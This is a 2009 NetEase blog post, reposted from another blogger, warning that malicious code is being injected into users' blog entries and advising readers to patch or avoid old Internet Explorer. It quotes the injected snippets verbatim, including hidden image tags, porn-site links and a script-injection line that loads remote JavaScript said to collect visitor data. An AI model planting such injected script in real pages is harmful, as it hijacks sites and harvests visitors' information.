登录  
 加关注
查看详情
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

影子之美

时光踩碎了影子,匆匆,几度寒暑;光阴剪辑着目光,依依,旧日犹望!

 
 
 

日志

 
 
关于我

本博为本人原创(除标注外),需要刊用、复制或转载请注明出处,并与QQ 406902551 电子信箱:by0062@163.com 手机13037051970联系! This blog is original (except mark), please contact with QQ 406902551 E-mail address: by0062@163.com contact phone 13037051970!

最近网易博客上流传的恶意代码  

2009-06-23 22:04:29|  分类: 默认分类 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

  这几天在我的网易博客中发现莫名奇妙地被写入了代码,另外,就是本来的私人日志忽然公开了,也听博友说过无法发表评论的事,同时,看到不少博友也中招了,现转载一文,提醒博友们注意。同时,请网易博客管理员尽快想办法解决此事!

下文转载自:  最近网易博客上流传的恶意代码 - 超哥的日志 - 网易博客

现象:
一篇正常的日志,莫名其妙地在日志的头部会多出一段代码:

<IMG title=0 height=0 alt=0 src="http://hi.baidu.com.googl0/ee.cn/ee.jpg" width=0> <A href="http://love.avtupian.com/a/163/index.html" target=_blank><IMG title=AV美女图片站:http://avtupian.com去了就想... alt=AV美女图片站:http://avtupian.com去了就想... src="http://love.avtupian.com/a/163/daolian.gif"></A>

而且删掉之后还会被加上。

有同学分析过代码,该代码除了弹广告、修改日志、自动分享日志外,还搜集用户个人信息,包括IP地址等。

建议使用IE浏览器的同学尽快打上补丁,或是使用非IE内核的浏览器上网。

6月22日晚Update:

根据博友“老港”同学提供的线索,目前代码的形式已变为:

<img title="" alt="" src="http://hi.baidu.com.googl0/ee.cn/ee.jpg" height="0" width="0"><img title="" alt="" src="http://hi.baidu.com.googl0/ee.cn/ee.jpg" s=document.createElement('script');s.src='http://love.avtupian.com/a/163/blog.jpg';s.type='text/javascript';s.charset='gb2312';document.getElementsByTagName('head').item(0).appendChild(s);" width="0" height="0">

而且在网易博客上蔓延速度很快,随便去查看了一些博友的日志,大多数都不幸中招!

中招的博客貌似发表评论会不成功,有些还会在日志正文出现乱码。

顺便调查一下,中招的同学你们用的浏览器是什么?是IE6?IE7?IE8?还是其他的浏览器?(感觉中招的基本上都是用低版本的IE。)


引文来源  最近网易博客上流传的恶意代码 - 超哥的日志 - 网易博客
  评论这张
 
阅读(487)| 评论(33)

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018